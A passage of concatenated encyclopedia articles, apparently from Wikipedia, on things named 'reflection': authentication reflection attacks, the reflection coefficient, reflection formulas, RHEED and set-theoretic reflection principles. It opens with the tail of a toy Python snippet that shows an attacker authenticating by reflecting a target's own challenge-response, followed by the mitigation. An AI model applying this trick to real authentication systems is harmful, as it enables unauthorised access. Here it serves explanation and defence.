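# challenge; the target, running the same protocol in the other direction, answers it.
reflected = target.answer(c)

# Back on connection 1, the reflected answer is accepted as valid.
print(target.verify(reflected))   # True: the attacker authenticates without the key
```

Breaking the symmetry, for instance by binding the responder's identity or the connection direction into the response, or by using different keys for each direction, removes the attacker's ability to reuse the target's own answer.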
Some of the most common solutions to this attack are described below: | https://en.wikipedia.org/wiki/Reflection_attack |
In physics and electrical engineering the reflection coefficient is a parameter that describes how much of a wave is reflected by an impedance discontinuity in the transmission medium. It is equal to the ratio of the amplitude of the reflected wave to the incident wave, with each expressed as phasors . For example, it is used in optics to calculate the amount of light that is reflected from a surface with a different index of refraction, such as a glass surface, or in an electrical transmission line to calculate how much of the electromagnetic wave is reflected by an impedance discontinuity. The reflection coefficient is closely related to the transmission coefficient . The reflectance of a system is also sometimes called a reflection coefficient.
Different disciplines have different applications for the term.
In telecommunications and transmission line theory, the reflection coefficient is the ratio of the complex amplitude of the reflected wave to that of the incident wave. The voltage and current at any point along a transmission line can always be resolved into forward and reflected traveling waves given a specified reference impedance Z 0 . The reference impedance used is typically the characteristic impedance of a transmission line that's involved, but one can speak of reflection coefficient without any actual transmission line being present. In terms of the forward and reflected waves determined by the voltage and current, the reflection coefficient is defined as the complex ratio of the voltage of the reflected wave ( V − {\displaystyle V^{-}} ) to that of the incident wave ( V + {\displaystyle V^{+}} ). This is typically represented with a Γ {\displaystyle \Gamma } (capital gamma ) and can be written as:
It can also be defined using the currents associated with the reflected and forward waves, but introducing a minus sign to account for the opposite orientations of the two currents:
The reflection coefficient may also be established using other field or circuit pairs of quantities whose product defines power resolvable into a forward and reverse wave. With electromagnetic plane waves, one uses the ratio of the electric fields of the reflected to that of the incident wave (or magnetic fields, again with a minus sign); the ratio of each wave's electric field E to its magnetic field H is the medium's characteristic impedance, Z 0 {\displaystyle Z_{0}} , (equal to the impedance of free space if the medium is a vacuum). [ 1 ]
In the accompanying figure, a signal source with internal impedance Z S {\displaystyle Z_{S}} possibly followed by a transmission line of characteristic impedance Z S {\displaystyle Z_{S}} is represented by its Thévenin equivalent , driving the load Z L {\displaystyle Z_{L}} . For a real (resistive) source impedance Z S {\displaystyle Z_{S}} , if we define Γ {\displaystyle \Gamma } using the reference impedance Z 0 = Z S {\displaystyle Z_{0}=Z_{S}} then the source's maximum power is delivered to a load Z L = Z 0 {\displaystyle Z_{L}=Z_{0}} , in which case Γ = 0 {\displaystyle \Gamma =0} implying no reflected power. More generally, the squared-magnitude of the reflection coefficient | Γ | 2 {\displaystyle |\Gamma |^{2}} denotes the proportion of that power that is reflected back to the source, with the power actually delivered toward the load being 1 − | Γ | 2 {\displaystyle 1-|\Gamma |^{2}} .
Anywhere along an intervening (lossless) transmission line of characteristic impedance Z 0 {\displaystyle Z_{0}} , the magnitude of the reflection coefficient | Γ | {\displaystyle |\Gamma |} will remain the same (the powers of the forward and reflected waves stay the same) but with a different phase. In the case of a short circuited load ( Z L = 0 {\displaystyle Z_{L}=0} ), one finds Γ = − 1 {\displaystyle \Gamma =-1} at the load. This implies the reflected wave having a 180° phase shift (phase reversal) with the voltages of the two waves being opposite at that point and adding to zero (as a short circuit demands).
The reflection coefficient is determined by the load impedance at the end of the transmission line, as well as the characteristic impedance of the line. A load impedance of Z L {\displaystyle Z_{L}} terminating a line with a characteristic impedance of Z 0 {\displaystyle Z_{0}\,} will have a reflection coefficient of Γ = Z L − Z 0 Z L + Z 0 . {\displaystyle \Gamma ={\frac {Z_{L}-Z_{0}}{Z_{L}+Z_{0}}}.}
This is the coefficient at the load. The reflection coefficient can also be measured at other points on the line. The magnitude of the reflection coefficient in a lossless transmission line is constant along the line (as are the powers in the forward and reflected waves). However its phase will be shifted by an amount dependent on the electrical distance ϕ {\displaystyle \phi } from the load. If the coefficient is measured at a point L {\displaystyle L} meters from the load, so the electrical distance from the load is ϕ = 2 π L / λ {\displaystyle \phi =2\pi L/\lambda } radians, the coefficient Γ ′ {\displaystyle \Gamma '} at that point will be Γ ′ = Γ e − 2 j ϕ . {\displaystyle \Gamma '=\Gamma e^{-2j\phi }.}
Note that the phase of the reflection coefficient is changed by twice the phase length of the attached transmission line. This accounts not only for the phase delay of the reflected wave, but also for the phase shift that had first been applied to the forward wave, the reflection coefficient being the quotient of these. The reflection coefficient so measured, Γ ′ {\displaystyle \Gamma '} , corresponds to an impedance which is generally dissimilar to Z L {\displaystyle Z_{L}} present at the far side of the transmission line.
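As a rough numerical illustration of the two relations above (the coefficient at the load and its phase rotation along a lossless line), the following Python sketch uses purely illustrative impedance, wavelength and distance values; it is not part of the article.

```python
import cmath, math

Z0 = 50.0           # reference / characteristic impedance, ohms (illustrative)
ZL = 75.0 + 25.0j   # load impedance, ohms (illustrative)

# Reflection coefficient at the load: (ZL - Z0) / (ZL + Z0)
gamma_load = (ZL - Z0) / (ZL + Z0)

# Moving back from the load by L metres rotates the coefficient by twice the
# electrical length phi = 2*pi*L/lambda; on a lossless line the magnitude is unchanged.
wavelength = 2.0    # metres (illustrative)
L = 0.3             # metres from the load (illustrative)
phi = 2 * math.pi * L / wavelength
gamma_here = gamma_load * cmath.exp(-2j * phi)

print(abs(gamma_load), abs(gamma_here))          # equal magnitudes on a lossless line
print(cmath.phase(gamma_load), cmath.phase(gamma_here))   # phases differ by 2*phi
```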
The complex reflection coefficient (in the region | Γ | ≤ 1 {\displaystyle |\Gamma |\leq 1} , corresponding to passive loads) may be displayed graphically using a Smith chart . The Smith chart is a polar plot of Γ {\displaystyle \Gamma } , therefore the magnitude of Γ {\displaystyle \Gamma } is given directly by the distance of a point to the center (with the edge of the Smith chart corresponding to | Γ | = 1 {\displaystyle |\Gamma |=1} ). Its evolution along a transmission line is likewise described by a rotation of 2 ϕ {\displaystyle 2\phi } around the chart's center. Using the scales on a Smith chart, the resulting impedance (normalized to Z 0 {\displaystyle Z_{0}} ) can directly be read. Before the advent of modern electronic computers, the Smith chart was of particular use as a sort of analog computer for this purpose.
The standing wave ratio (SWR) is determined solely by the magnitude of the reflection coefficient: S W R = 1 + | Γ | 1 − | Γ | . {\displaystyle \mathrm {SWR} ={\frac {1+|\Gamma |}{1-|\Gamma |}}.}
Along a lossless transmission line of characteristic impedance Z 0 , the SWR signifies the ratio of the voltage (or current) maxima to minima (or what it would be if the transmission line were long enough to produce them). The above calculation assumes that Γ {\displaystyle \Gamma } has been calculated using Z 0 as the reference impedance. Since it uses only the magnitude of Γ {\displaystyle \Gamma } , the SWR intentionally ignores the specific value of the load impedance Z L responsible for it, depending only on the magnitude of the resulting impedance mismatch . That SWR remains the same wherever measured along a transmission line (looking towards the load) since the addition of a transmission line length to a load Z L {\displaystyle Z_{L}} only changes the phase, not the magnitude, of Γ {\displaystyle \Gamma } . While having a one-to-one correspondence with the reflection coefficient, SWR is the most commonly used figure of merit in describing the mismatch affecting a radio antenna or antenna system. It is most often measured at the transmitter side of a transmission line, but has, as explained, the same value as would be measured at the antenna (load) itself.
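A short sketch of the SWR relation above; the numbers are illustrative only.

```python
def swr(gamma: complex) -> float:
    # Standing wave ratio from the magnitude of the reflection coefficient.
    m = abs(gamma)
    return (1 + m) / (1 - m) if m < 1 else float("inf")

print(swr(0.2))                      # 1.5
print(swr((75 - 50) / (75 + 50)))    # also 1.5: a 75-ohm load on a 50-ohm line
```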
A transmission line is an example of a 2-port electrical network , but reflection coefficients are useful in the analysis of any electrical network. A reflection coefficient can be defined for each port in the same way as for the boundary of a transmission line. It will, however, also depend on the properties of the connections at the other ports and so is not a property intrinsic to the network itself. For a 2-port network with the 2x2 scattering matrix S , and with a source and load connected to its input and output, where the reflections off the source back into the input are Γ S {\displaystyle \Gamma _{S}} and the reflections off the load back into the output are Γ L {\displaystyle \Gamma _{L}} , then the reflection coefficients at the input and output are given by: [ 2 ]
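Assuming the standard 2-port relations Γ_in = S11 + S12·S21·Γ_L/(1 − S22·Γ_L) and Γ_out = S22 + S12·S21·Γ_S/(1 − S11·Γ_S), the sketch below simply evaluates them for purely illustrative scattering parameters and terminations (none of the numbers come from the article).

```python
def gamma_in(S11, S12, S21, S22, gamma_L):
    # Reflection looking into the input port with the output terminated by gamma_L.
    return S11 + (S12 * S21 * gamma_L) / (1 - S22 * gamma_L)

def gamma_out(S11, S12, S21, S22, gamma_S):
    # Reflection looking into the output port with the input terminated by gamma_S.
    return S22 + (S12 * S21 * gamma_S) / (1 - S11 * gamma_S)

# Illustrative S-parameters and terminations
S11, S12, S21, S22 = 0.1 + 0.0j, 0.05j, 2.0 + 0.5j, 0.2 + 0.1j
print(gamma_in(S11, S12, S21, S22, gamma_L=0.3))
print(gamma_out(S11, S12, S21, S22, gamma_S=0.1))
```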
The reflection coefficient is used in feeder testing to assess the reliability of the transmission medium.
In optics and electromagnetics in general, reflection coefficient can refer to either the amplitude reflection coefficient described here, or the reflectance , depending on context. Typically, the reflectance is represented by a capital R , while the amplitude reflection coefficient is represented by a lower-case r . These related concepts are covered by Fresnel equations in classical optics .
Acousticians use reflection coefficients to understand the effect of different materials on their acoustic environments. The field properties used to define the reflection coefficient are typically the acoustic pressure and velocity in the incident and reflected acoustic waves. | https://en.wikipedia.org/wiki/Reflection_coefficient |
In mathematics , a reflection formula or reflection relation for a function f is a relationship between f ( a − x ) and f ( x ) . It is a special case of a functional equation . It is common in mathematical literature to use the term "functional equation" for what are specifically reflection formulae.
Reflection formulae are useful for numerical computation of special functions . In effect, an approximation that has greater accuracy or only converges on one side of a reflection point (typically in the positive half of the complex plane ) can be employed for all arguments.
The even and odd functions satisfy by definition simple reflection relations around a = 0 . For all even functions,
f ( − x ) = f ( x ) , {\displaystyle f(-x)=f(x),}
and for all odd functions,
f ( − x ) = − f ( x ) . {\displaystyle f(-x)=-f(x).}
A famous relationship is Euler's reflection formula
Γ ( z ) Γ ( 1 − z ) = π sin ( π z ) , z ∉ Z {\displaystyle \Gamma (z)\Gamma (1-z)={\frac {\pi }{\sin {(\pi z)}}},\qquad z\not \in \mathbb {Z} }
for the gamma function Γ ( z ) {\textstyle \Gamma (z)} , due to Leonhard Euler .
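A quick numerical check of the identity for a non-integer argument, using only the standard library:

```python
import math

z = 0.3
lhs = math.gamma(z) * math.gamma(1 - z)
rhs = math.pi / math.sin(math.pi * z)
print(lhs, rhs, math.isclose(lhs, rhs))   # the two sides agree to machine precision
```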
There is also a reflection formula for the general n -th order polygamma function ψ ( n ) ( z ) ,
ψ ( n ) ( 1 − z ) + ( − 1 ) n + 1 ψ ( n ) ( z ) = ( − 1 ) n π d n d z n cot ( π z ) {\displaystyle \psi ^{(n)}(1-z)+(-1)^{n+1}\psi ^{(n)}(z)=(-1)^{n}\pi {\frac {d^{n}}{dz^{n}}}\cot {(\pi z)}}
which springs trivially from the fact that the polygamma functions are defined as the derivatives of ln Γ {\textstyle \ln \Gamma } and thus inherit the reflection formula.
The dilogarithm also satisfies a reflection formula, [ 1 ] [ 2 ]
Li 2 ( z ) + Li 2 ( 1 − z ) = ζ ( 2 ) − ln ( z ) ln ( 1 − z ) {\displaystyle \operatorname {Li} _{2}(z)+\operatorname {Li} _{2}(1-z)=\zeta (2)-\ln(z)\ln(1-z)}
The Riemann zeta function ζ ( z ) satisfies
ζ ( 1 − z ) ζ ( z ) = 2 Γ ( z ) ( 2 π ) z cos ( π z 2 ) , {\displaystyle {\frac {\zeta (1-z)}{\zeta (z)}}={\frac {2\,\Gamma (z)}{(2\pi )^{z}}}\cos \left({\frac {\pi z}{2}}\right),}
and the Riemann Xi function ξ ( z ) satisfies
ξ ( z ) = ξ ( 1 − z ) . {\displaystyle \xi (z)=\xi (1-z).} | https://en.wikipedia.org/wiki/Reflection_formula |
Reflection high-energy electron diffraction ( RHEED ) is a technique used to characterize the surface of crystalline materials. RHEED systems gather information only from the surface layer of the sample, which distinguishes RHEED from other materials characterization methods that also rely on diffraction of high-energy electrons . Transmission electron microscopy , another common electron diffraction method, samples mainly the bulk of the sample due to the geometry of the system, although in special cases it can provide surface information. Low-energy electron diffraction (LEED) is also surface sensitive, but LEED achieves surface sensitivity through the use of low energy electrons.
A RHEED system requires an electron source (gun), photoluminescent detector screen and a sample with a clean surface, although modern RHEED systems have additional parts to optimize the technique. [ 1 ] [ 2 ] The electron gun generates a beam of electrons which strike the sample at a very small angle relative to the sample surface. Incident electrons diffract from atoms at the surface of the sample, and a small fraction of the diffracted electrons interfere constructively at specific angles and form regular patterns on the detector. The electrons interfere according to the position of atoms on the sample surface, so the diffraction pattern at the detector is a function of the sample surface. Figure 1 shows the most basic setup of a RHEED system.
In the RHEED setup, only atoms at the sample surface contribute to the RHEED pattern. [ 3 ] The glancing angle of incident electrons allows them to escape the bulk of the sample and to reach the detector. Atoms at the sample surface diffract (scatter) the incident electrons due to the wavelike properties of electrons.
The diffracted electrons interfere constructively at specific angles according to the crystal structure and spacing of the atoms at the sample surface and the wavelength of the incident electrons. Some of the electron waves created by constructive interference collide with the detector, creating specific diffraction patterns according to the surface features of the sample. Users characterize the crystallography of the sample surface through analysis of the diffraction patterns. Figure 2 shows a RHEED pattern. Video 1 depicts a metrology instrument recording the RHEED intensity oscillations and deposition rate for process control and analysis.
Two types of diffraction contribute to RHEED patterns. Some incident electrons undergo a single, elastic scattering event at the crystal surface, a process termed kinematic scattering. [ 1 ] Dynamic scattering occurs when electrons undergo multiple diffraction events in the crystal and lose some of their energy due to interactions with the sample. [ 1 ] Users extract qualitative data from the kinematically diffracted electrons. These electrons account for the high intensity spots or rings common to RHEED patterns. RHEED users also analyze dynamically scattered electrons with complex techniques and models to gather quantitative information from RHEED patterns. [ 3 ]
RHEED users construct Ewald's spheres to find the crystallographic properties of the sample surface. Ewald's spheres show the allowed diffraction conditions for kinematically scattered electrons in a given RHEED setup. The diffraction pattern at the screen relates to the Ewald's sphere geometry, so RHEED users can directly calculate the reciprocal lattice of the sample with a RHEED pattern, the energy of the incident electrons and the distance from the detector to the sample. The user must relate the geometry and spacing of the spots of a perfect pattern to the Ewald's sphere in order to determine the reciprocal lattice of the sample surface.
The Ewald's sphere analysis is similar to that for bulk crystals, however the reciprocal lattice for the sample differs from that for a 3D material due to the surface sensitivity of the RHEED process. The reciprocal lattices of bulk crystals consist of a set of points in 3D space. However, only the first few layers of the material contribute to the diffraction in RHEED, so there are no diffraction conditions in the dimension perpendicular to the sample surface. Due to the lack of a third diffracting condition, the reciprocal lattice of a crystal surface is a series of infinite rods extending perpendicular to the sample's surface. [ 4 ] These rods originate at the conventional 2D reciprocal lattice points of the sample's surface.
The Ewald's sphere is centered on the sample surface with a radius equal to the magnitude of the wavevector of the incident electrons, | k i | = 2 π λ , {\displaystyle |k_{i}|={\frac {2\pi }{\lambda }},} (1)
where λ is the electrons' de Broglie wavelength .
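As a numerical aside (not from the article), the sketch below evaluates the de Broglie wavelength, with the usual relativistic correction, and the corresponding wavevector magnitude k = 2π/λ for a typical RHEED beam energy; the constants are CODATA values and the 20 keV energy is illustrative.

```python
import math

h  = 6.62607015e-34      # Planck constant, J*s
me = 9.1093837015e-31    # electron rest mass, kg
c  = 2.99792458e8        # speed of light, m/s
q  = 1.602176634e-19     # elementary charge, C

E_keV = 20.0                     # illustrative RHEED beam energy
E = E_keV * 1e3 * q              # kinetic energy in joules

# de Broglie wavelength with the first-order relativistic correction
lam = h / math.sqrt(2 * me * E * (1 + E / (2 * me * c ** 2)))
k = 2 * math.pi / lam            # radius of the Ewald sphere (wavevector magnitude)

print(f"lambda ~ {lam * 1e12:.2f} pm, |k_i| ~ {k:.3e} 1/m")
# roughly 8.6 pm at 20 keV, so the Ewald sphere is enormous compared with
# typical reciprocal-lattice spacings of order 2*pi / (a few angstroms)
```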
Diffraction conditions are satisfied where the rods of reciprocal lattice intersect the Ewald's sphere. Therefore, the magnitude of a vector from the origin of the Ewald's sphere to the intersection of any reciprocal lattice rods is equal in magnitude to that of the incident beam. This is expressed as
| k h l | = | k i | {\displaystyle |k_{hl}|=|k_{i}|} (2)
Here, k hl is the wave vector of the elastically diffracted electrons of the order (hl) at any intersection of reciprocal lattice rods with Ewald's sphere
The projections of the two vectors onto the plane of the sample's surface differ by a reciprocal lattice vector G hl ,
G h l = k h l | | − k i | | {\displaystyle G_{hl}=k_{hl}^{||}-k_{i}^{||}} (3)
Figure 3 shows the construction of the Ewald's sphere and provides examples of the G, k hl and k i vectors.
Many of the reciprocal lattice rods meet the diffraction condition, however the RHEED system is designed such that only the low orders of diffraction are incident on the detector. The RHEED pattern at the detector is a projection only of the k vectors that are within the angular range that contains the detector. The size and position of the detector determine which of the diffracted electrons are within the angular range that reaches the detector, so the geometry of the RHEED pattern can be related back to the geometry of the reciprocal lattice of the sample surface through use of trigonometric relations and the distance from the sample to detector.
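In the common small-angle approximation (a simplification of the trigonometric relation described above, not the article's exact construction), an in-plane row spacing d follows from the streak separation t on the screen, the camera length L_cam and the wavelength λ roughly as d ≈ λ·L_cam/t; all numbers below are illustrative.

```python
lam   = 8.6e-12   # electron wavelength in metres (roughly a 20 keV beam)
L_cam = 0.30      # sample-to-detector ("camera") distance in metres, illustrative
t     = 6.5e-3    # measured streak separation on the screen in metres, illustrative

d = lam * L_cam / t                      # small-angle estimate of the surface row spacing
print(f"d ~ {d * 1e10:.2f} angstroms")   # ~3.97 angstroms for these numbers
```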
The k vectors are labeled such that the vector k00 that forms the smallest angle with the sample surface is called the 0th order beam. [ 3 ] The 0th order beam is also known as the specular beam. Each successive intersection of a rod and the sphere further from the sample surface is labeled as a higher order reflection.
Because of the way the center of the Ewald's sphere is positioned, the specular beam forms the same angle with the substrate as the incident electron beam. The specular point has the greatest intensity on a RHEED pattern and is labeled as the (00) point by convention. [ 3 ] The other points on the RHEED pattern are indexed according to the reflection order they project.
The radius of the Ewald's sphere is much larger than the spacing between reciprocal lattice rods because the incident beam has a very short wavelength due to its high-energy electrons. Rows of reciprocal lattice rods actually intersect the Ewald's sphere as an approximate plane because identical rows of parallel reciprocal lattice rods sit directly in front of and behind the single row shown. [ 1 ] Figure 3 shows a cross sectional view of a single row of reciprocal lattice rods fulfilling the diffraction conditions. The reciprocal lattice rods in Figure 3 show the end-on view of these planes, which are perpendicular to the plane of the figure.
The intersections of these effective planes with the Ewald's sphere forms circles, called Laue circles. The RHEED pattern is a collection of points on the perimeters of concentric Laue circles around the center point. However, interference effects between the diffracted electrons still yield strong intensities at single points on each Laue circle. Figure 4 shows the intersection of one of these planes with the Ewald's Sphere.
The azimuthal angle affects the geometry and intensity of RHEED patterns. [ 4 ] The azimuthal angle is the angle at which the incident electrons intersect the ordered crystal lattice on the surface of the sample. Most RHEED systems are equipped with a sample holder that can rotate the crystal around an axis perpendicular to the sample surface. RHEED users rotate the sample to optimize the intensity profiles of patterns. Users generally index at least 2 RHEED scans at different azimuth angles for reliable characterization of the crystal's surface structure. [ 4 ] Figure 5 shows a schematic diagram of an electron beam incident on the sample at different azimuth angles.
Users sometimes rotate the sample around an axis perpendicular to the sampling surface during RHEED experiments to create a RHEED pattern called the azimuthal plot. [ 4 ] Rotating the sample changes the intensity of the diffracted beams due to their dependence on the azimuth angle. [ 5 ] RHEED specialists characterize film morphologies by measuring the changes in beam intensity and comparing these changes to theoretical calculations, which can effectively model the dependence of the intensity of diffracted beams on the azimuth angle. [ 5 ]
The dynamically, or inelastically, scattered electrons provide several types of information about the sample as well. The brightness or intensity at a point on the detector depends on dynamic scattering, so all analysis involving the intensity must account for dynamic scattering. [ 1 ] [ 3 ] Some inelastically scattered electrons penetrate the bulk crystal and fulfill Bragg diffraction conditions. These inelastically scattered electrons can reach the detector to yield Kikuchi diffraction patterns, which are useful for calculating diffraction conditions. [ 3 ] Kikuchi patterns are characterized by lines connecting the intense diffraction points on a RHEED pattern. Figure 6 shows a RHEED pattern with visible Kikuchi lines .
The electron gun is one of the most important pieces of equipment in a RHEED system. [ 1 ] The gun limits the resolution and testing limits of the system. Tungsten filaments are the primary electron source for the electron gun of most RHEED systems due to the low work function of tungsten. In the typical setup, the tungsten filament is the cathode and a positively biased anode draws electrons from the tip of the tungsten filament. [ 1 ]
The magnitude of the anode bias determines the energy of the incident electrons. The optimal anode bias is dependent upon the type of information desired. At large incident angles, electrons with high energy can penetrate the surface of the sample and degrade the surface sensitivity of the instrument. [ 1 ] However, the dimensions of the Laue zones are proportional to the inverse square of the electron energy, meaning that more information is recorded at the detector at higher incident electron energies. [ 1 ] For general surface characterization, the electron gun is operated in the range of 10-30 keV. [ 3 ]
In a typical RHEED setup, one magnetic and one electric field focus the incident beam of electrons. [ 1 ] A negatively biased Wehnelt electrode positioned between the cathode filament and anode applies a small electric field, which focuses the electrons as they pass through the anode. An adjustable magnetic lens focuses the electrons onto the sample surface after they pass through the anode. A typical RHEED source has a focal length around 50 cm. [ 3 ] The beam is focused to the smallest possible point at the detector rather than the sample surface so that the diffraction pattern has the best resolution. [ 1 ]
Phosphor screens that exhibit photoluminescence are widely used as detectors. These detectors emit green light from areas where electrons hit their surface and are common to TEM as well. The detector screen is useful for aligning the pattern to an optimal position and intensity. CCD cameras capture the patterns to allow for digital analysis.
The sample surface must be extremely clean for effective RHEED experiments. Contaminants on the sample surface interfere with the electron beam and degrade the quality of the RHEED pattern. RHEED users employ two main techniques to create clean sample surfaces. Small samples can be cleaved in the vacuum chamber prior to RHEED analysis. [ 6 ] The newly exposed, cleaved surface is analyzed. Large samples, or those that cannot be cleaved prior to RHEED analysis, can be coated with a passive oxide layer prior to analysis. [ 6 ] Subsequent heat treatment under the vacuum of the RHEED chamber removes the oxide layer and exposes the clean sample surface.
Because gas molecules diffract electrons and affect the quality of the electron gun, RHEED experiments are performed under vacuum. The RHEED system must operate at a pressure low enough to prevent significant scattering of the electron beams by gas molecules in the chamber. At electron energies of 10 keV, a chamber pressure of 10 −5 mbar or lower is necessary to prevent significant scattering of electrons by the background gas. [ 6 ] In practice, RHEED systems are operated under ultra high vacuums. The chamber pressure is minimized as much as possible in order to optimize the process. The vacuum conditions limit the types of materials and processes that can be monitored in situ with RHEED.
Previous analysis focused only on diffraction from a perfectly flat surface of a crystal surface. However, non-flat surfaces add additional diffraction conditions to RHEED analysis.
Streaked or elongated spots are common to RHEED patterns. As Fig 3 shows, the reciprocal lattice rods with the lowest orders intersect the Ewald sphere at very small angles, so the intersection between the rods and sphere is not a singular point if the sphere and rods have thickness. The incident electron beam diverges and electrons in the beam have a range of energies, so in practice, the Ewald sphere is not infinitely thin as it is theoretically modeled. The reciprocal lattice rods have a finite thickness as well, with their diameters dependent on the quality of the sample surface. Streaks appear in the place of perfect points when broadened rods intersect the Ewald sphere. Diffraction conditions are fulfilled over the entire intersection of the rods with the sphere, yielding elongated points or ‘streaks’ along the vertical axis of the RHEED pattern. In real cases, streaky RHEED patterns indicate a flat sample surface, while broadening of the streaks indicates a small area of coherence on the surface.
Surface features and polycrystalline surfaces add complexity or change RHEED patterns from those from perfectly flat surfaces. Growing films, nucleating particles, crystal twinning, grains of varying size and adsorbed species add complicated diffraction conditions to those of a perfect surface. [ 7 ] [ 8 ] Superimposed patterns of the substrate and heterogeneous materials, complex interference patterns and degradation of the resolution are characteristic of complex surfaces or those partially covered with heterogeneous materials.
RHEED is an extremely popular technique for monitoring the growth of thin films. In particular, RHEED is well suited for use with molecular beam epitaxy (MBE), a process used to form high quality, ultrapure thin films under ultrahigh vacuum growth conditions. [ 9 ] The intensities of individual spots on the RHEED pattern fluctuate in a periodic manner as a result of the relative surface coverage of the growing thin film. Figure 8 shows an example of the intensity fluctuating at a single RHEED point during MBE growth.
Each full period corresponds to formation of a single atomic layer thin film. The oscillation period is highly dependent on the material system, electron energy and incident angle, so researchers obtain empirical data to correlate the intensity oscillations and film coverage before using RHEED for monitoring film growth. [ 6 ]
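Once that correlation is established, converting a measured oscillation period into a growth rate is a one-line calculation; the sketch below assumes, as the text states, one full period per completed monolayer, with purely illustrative numbers.

```python
period_s     = 4.2    # measured RHEED oscillation period, seconds (illustrative)
monolayer_nm = 0.28   # thickness of one monolayer for the material, nm (illustrative)

rate_nm_per_s = monolayer_nm / period_s     # one monolayer grown per oscillation period
print(f"growth rate ~ {rate_nm_per_s:.3f} nm/s ({rate_nm_per_s * 3600:.0f} nm/h)")
```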
Video 1 depicts a metrology instrument recording the RHEED intensity oscillations and deposition rate for process control and analysis.
Reflection high energy electron diffraction - total reflection angle X-ray spectroscopy is a technique for monitoring the chemical composition of crystals. [ 10 ] RHEED-TRAXS analyzes X-ray spectral lines emitted from a crystal as a result of electrons from a RHEED gun colliding with the surface.
RHEED-TRAXS is preferable to X-ray microanalysis (XMA) (such as EDS and WDS ) because the incidence angle of the electrons on the surface is very small, typically less than 5°. As a result, the electrons do not penetrate deeply into the crystal, meaning the X-ray emission is restricted to the top of the crystal, allowing for real-time, in-situ monitoring of surface stoichiometry.
The experimental setup is fairly simple. Electrons are fired onto a sample, causing X-ray emission. These X-rays are then detected using a silicon-lithium (Si-Li) crystal placed behind beryllium windows, which maintain the vacuum.
MCP-RHEED is a system in which an electron beam is amplified by a micro-channel plate (MCP). This system consists of an electron gun and an MCP equipped with a fluorescent screen opposite to the electron gun. Because of the amplification, the intensity of the electron beam can be decreased by several orders of magnitude and the damage to the samples is diminished. This method is used to observe the growth of insulator crystals such as organic films and alkali halide films, which are easily damaged by electron beams. [ 11 ] | https://en.wikipedia.org/wiki/Reflection_high-energy_electron_diffraction |
In set theory , a branch of mathematics , a reflection principle says that it is possible to find sets that, with respect to any given property, resemble the class of all sets. There are several different forms of the reflection principle depending on exactly what is meant by "resemble". Weak forms of the reflection principle are theorems of ZF set theory due to Montague (1961) , while stronger forms can be new and very powerful axioms for set theory.
The name "reflection principle" comes from the fact that properties of the universe of all sets are "reflected" down to a smaller set.
A naive version of the reflection principle states that "for any property of the universe of all sets we can find a set with the same property". This leads to an immediate contradiction: the universe of all sets contains all sets, but there is no set with the property that it contains all sets. To get useful (and non-contradictory) reflection principles we need to be more careful about what we mean by "property" and what properties we allow.
Reflection principles are associated with attempts to formulate the idea that no one notion, idea, or statement can capture our whole view of the universe of sets . [ 1 ] Kurt Gödel described it as follows: [ 2 ]
The universe of all sets is structurally indefinable. One possible way to make this statement precise is the following: The universe of sets cannot be uniquely characterized (i.e., distinguished from all its initial segments) by any internal structural property of the membership relation in it which is expressible in any logic of finite or transfinite type, including infinitary logics of any cardinal number . This principle may be considered a generalization of the closure principle.
All the principles for setting up the axioms of set theory should be reducible to Ackermann 's principle: The Absolute is unknowable. The strength of this principle increases as we get stronger and stronger systems of set theory. The other principles are only heuristic principles. Hence, the central principle is the reflection principle, which presumably will be understood better as our experience increases. Meanwhile, it helps to separate out more specific principles which either give some additional information or are not yet seen clearly to be derivable from the reflection principle as we understand it now.
Generally I believe that, in the last analysis, every axiom of infinity should be derivable from the (extremely plausible) principle that V is indefinable, where definability is to be taken in [a] more and more generalized and idealized sense.
Georg Cantor expressed similar views on absolute infinity : all cardinality properties satisfied by the absolute are also held by some smaller cardinal.
To find non-contradictory reflection principles we might argue informally as follows. Suppose that we have some collection A of methods for forming sets (for example, taking powersets , subsets , the axiom of replacement , and so on). We can imagine taking all sets obtained by repeatedly applying all these methods, and form these sets into a class X , which can be thought of as a model of some set theory. But in light of this view, V is not exhaustible by a handful of operations, for otherwise it would be easily describable from below; this principle is known as inexhaustibility (of V ). [ 3 ] As a result, V is larger than X . Applying the methods in A to the set X itself would also result in a collection smaller than V , as V is not exhaustible from the image of X under the operations in A . Then we can introduce the following new principle for forming sets: "the collection of all sets obtained from some set by repeatedly applying all methods in the collection A is also a set". After adding this principle to A , V is still not exhaustible by the operations in this new A . This process may be repeated further and further, adding more and more operations to the set A and obtaining larger and larger models X . Each X resembles V in the sense that it shares the property with V of being closed under the operations in A .
We can use this informal argument in two ways. We can try to formalize it in (say) ZF set theory; by doing this we obtain some theorems of ZF set theory, called reflection theorems. Alternatively we can use this argument to motivate introducing new axioms for set theory, such as some axioms asserting existence of large cardinals . [ 3 ]
In trying to formalize the argument for the reflection principle of the previous section in ZF set theory, it turns out to be necessary to add some conditions about the collection of properties A (for example, A might be finite). Doing this produces several closely related "reflection theorems" all of which state that we can find a set that is almost a model of ZFC. In contrast to stronger reflection principles, these are provable in ZFC.
One of the most common reflection principles for ZFC is a theorem schema that can be described as follows: for any formula ϕ ( x 1 , … , x n ) {\displaystyle \phi (x_{1},\ldots ,x_{n})} with parameters, if ϕ ( x 1 , … , x n ) {\displaystyle \phi (x_{1},\ldots ,x_{n})} is true (in the set-theoretic universe V {\displaystyle V} ), then there is a level V α {\displaystyle V_{\alpha }} of the cumulative hierarchy such that V α ⊨ ϕ ( x 1 , … , x n ) {\displaystyle V_{\alpha }\vDash \phi (x_{1},\ldots ,x_{n})} . This is known as the Lévy-Montague reflection principle, [ 4 ] or the Lévy reflection principle, [ 5 ] principally investigated in Lévy (1960) and Montague (1961) . [ 6 ] Another version of this reflection principle says that for any finite number of formulas of ZFC we can find a set V α {\displaystyle V_{\alpha }} in the cumulative hierarchy such that all the formulas in the set are absolute for V α {\displaystyle V_{\alpha }} (which means very roughly that they hold in V α {\displaystyle V_{\alpha }} if and only if they hold in the universe of all sets). So this says that the set V α {\displaystyle V_{\alpha }} resembles the universe of all sets, at least as far as the given finite number of formulas is concerned.
Another reflection principle for ZFC is a theorem schema that can be described as follows: [ 7 ] [ 8 ] Let ϕ {\displaystyle \phi } be a formula with at most free variables x 1 , … , x n {\displaystyle x_{1},\ldots ,x_{n}} . Then ZFC proves that
where ϕ M {\displaystyle \phi ^{M}} denotes the relativization of ϕ {\displaystyle \phi } to M {\displaystyle M} (that is, replacing all quantifiers appearing in ϕ {\displaystyle \phi } of the form ∀ x {\displaystyle \forall x} and ∃ x {\displaystyle \exists x} by ∀ x ∈ M {\displaystyle \forall x{\in }M} and ∃ x ∈ M {\displaystyle \exists x{\in }M} , respectively).
